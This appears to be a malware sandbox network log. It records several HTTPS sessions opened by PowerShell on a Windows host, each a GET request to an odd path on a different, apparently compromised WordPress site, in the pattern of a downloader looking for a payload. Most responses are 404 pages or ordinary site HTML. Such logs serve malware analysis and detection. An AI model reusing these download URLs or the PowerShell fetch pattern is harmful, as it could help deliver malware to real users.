2024-11-07 17:29:31 UTC	6	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2024-11-07 17:29:31 UTC	8192	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 70 6b 67 2e 63 6f 6d 2f 73 77 69 70 65 72 2f 73 77 69 70 65 72 2d 62 75 6e 64 6c 65 2e 6d 69 6e 2e 63 73 Data Ascii: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.cs
2024-11-07 17:29:31 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-07 17:29:31 UTC	6	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2024-11-07 17:29:31 UTC	8192	IN	Data Raw: 22 3e 4d 6f 64 75 6c 65 73 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 39 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 39 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 73 69 78 2e 63 6f 6d 2f 6d 6f 64 75 6c 65 73 2f 6c 69 6e 65 2d 70 6c 61 6e 6e 69 6e 67 2f 22 3e 4c 69 6e 65 20 70 6c 61 6e 6e 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 37 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 Data Ascii: ">Modules</a><ul class="sub-menu"><li id="menu-item-59" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-59"><a href="https://trasix.com/modules/line-planning/">Line planning</a></li><li id="menu-item-57" class="menu-item menu-ite
2024-11-07 17:29:31 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-07 17:29:31 UTC	6	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2024-11-07 17:29:31 UTC	8192	IN	Data Raw: 32 30 4c 32 30 20 31 32 4c 31 32 20 34 5a 22 20 66 69 6c 6c 3d 22 23 46 30 46 30 46 30 22 2f 3e 20 3c 2f 73 76 67 3e 20 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 74 6f 70 5f 5f 69 6d 67 2d 65 72 72 6f 72 22 3e 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 73 69 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 72 61 73 69 78 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 61 7a 79 6c 6f 61 64 22 20 73 72 63 3d 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 25 32 30 78 6d 6c 6e 73 3d 25 32 32 Data Ascii: 20L20 12L12 4Z" fill="#F0F0F0"/> </svg> </span></a></div><div class="main-top__img-error"> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/error.png" alt=""></noscript><img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22
2024-11-07 17:29:31 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-07 17:29:31 UTC	5	IN	Data Raw: 38 34 38 0d 0a Data Ascii: 848

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49174	147.79.116.130	443	3868	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:39 UTC	180	OUT	GET /abc/Y6Y0fTbUEg6/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: www.parkinsons.co.in Connection: Keep-Alive
2024-11-07 17:29:39 UTC	620	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Thu, 07 Nov 2024 17:29:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: https://parkinsons.co.in/abc/Y6Y0fTbUEg6/ x-litespeed-cache: hit platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: afd9109c3a76a89436b347463056f30f-int-edge1 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.482

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49177	188.114.96.3	443	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:48 UTC	172	OUT	GET /wp-content/NR/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: pardiskood.com Connection: Keep-Alive
2024-11-07 17:29:49 UTC	900	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 17:29:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff referrer-policy: same-origin cross-origin-opener-policy: same-origin cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3xmV7PnC8mDm%2F35srIm5gfxSfkhiXbN6NfPJeG9%2FDqU1ZE7pxbXLHVvsnJ5W%2BxeLLOw1g0V6D5twRRVv%2BtadByzy957XpwP0bkX33qDYnWH0cofiZjhAvlomXgfv09SjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8def0c304b9b3464-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1213&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=786&delivery_rate=2197268&cwnd=251&unsent_bytes=0&cid=7b2fbd0b702768da&ts=424&x=0"
2024-11-07 17:29:49 UTC	185	IN	Data Raw: 62 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: b3<!doctype html><html lang="en"><head> <title>Not Found</title></head><body> <h1>Not Found</h1><p>The requested resource was not found on this server.</p></body></html>
2024-11-07 17:29:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49178	15.197.148.33	443	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:49 UTC	183	OUT	GET /wp-includes/63De/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: daujimaharajmandir.org Connection: Keep-Alive
2024-11-07 17:29:50 UTC	121	IN	HTTP/1.1 200 OK Content-Type: text/html Date: Thu, 07 Nov 2024 17:29:49 GMT Content-Length: 114 Connection: close
2024-11-07 17:29:50 UTC	114	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49180	104.21.3.222	443	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:50 UTC	191	OUT	GET /wp-admin/SJbxE5I/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: anugerahmasinternasional.co.id Connection: Keep-Alive
2024-11-07 17:29:52 UTC	989	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 17:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://anugerahmasinternasional.co.id/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9KcWcRLnTHi6DwWvOjlRUVsfpV2c0Q7%2FDe3qdAeH%2BwhRjUM7c61DEoxnGCQAMLJb4jmWHtEFlonzgLE7tVfYaj0jG9nSQkeiZvkXtffnmipmJ3FxY6Qv0bTujBzEM8OI4R54eCjZGtLQUfuL6bqG%2Bh4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8def0c3c8e972fd8-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1341&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2880&recv_bytes=805&delivery_rate=1930666&cwnd=251&unsent_bytes=0&cid=bacf4c8d3bf46e2e&ts=1918&x=0"
2024-11-07 17:29:52 UTC	380	IN	Data Raw: 35 65 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 77 63 61 20 3d 20 77 69 6e 64 6f 77 2e 5f 77 63 61 20 7c 7c 20 5b 5d 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 5e70<!DOCTYPE html><html lang="id"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1.0"><meta name='robots' content='noindex, follow' /><script>window._wca = window._wca \|\| [];</script>
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 64 5f 49 44 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 Data Ascii: found -</title><meta property="og:locale" content="id_ID" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"ht
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 2e 20 2d 2d 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 74 61 74 73 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 30 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: ge/"}}]}</script>... / Yoast SEO plugin. --><link rel='dns-prefetch' href='//stats.wp.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//c0.wp.com' /><link rel="alternate" type="application/rss+xml" t
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 68 61 73 2d 6c 61 72 67 65 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 68 75 67 65 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 65 64 69 74 6f 72 2d 73 74 79 6c 65 73 2d 77 72 61 70 70 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 7b 67 61 70 3a 30 3b 70 61 64 64 69 6e Data Ascii: has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;paddin
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 Data Ascii: --light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-viv
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 29 20 35 30 25 2c 72 67 62 28 36 35 2c 38 38 2c 32 30 38 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b Data Ascii: ) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 Data Ascii: argin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 Data Ascii: r(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-p
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c Data Ascii: preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-col
2024-11-07 17:29:52 UTC	1369	IN	Data Raw: 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 Data Ascii: s-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49182	207.174.214.153	443	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:57 UTC	189	OUT	GET /Fox-C404/mDHkfgebMRzmGKBy/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: anwaralbasateen.com Connection: Keep-Alive
2024-11-07 17:29:57 UTC	261	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 17:29:57 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 15 Mar 2022 01:33:40 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html
2024-11-07 17:29:57 UTC	583	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49184	188.114.96.3	443	3688	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
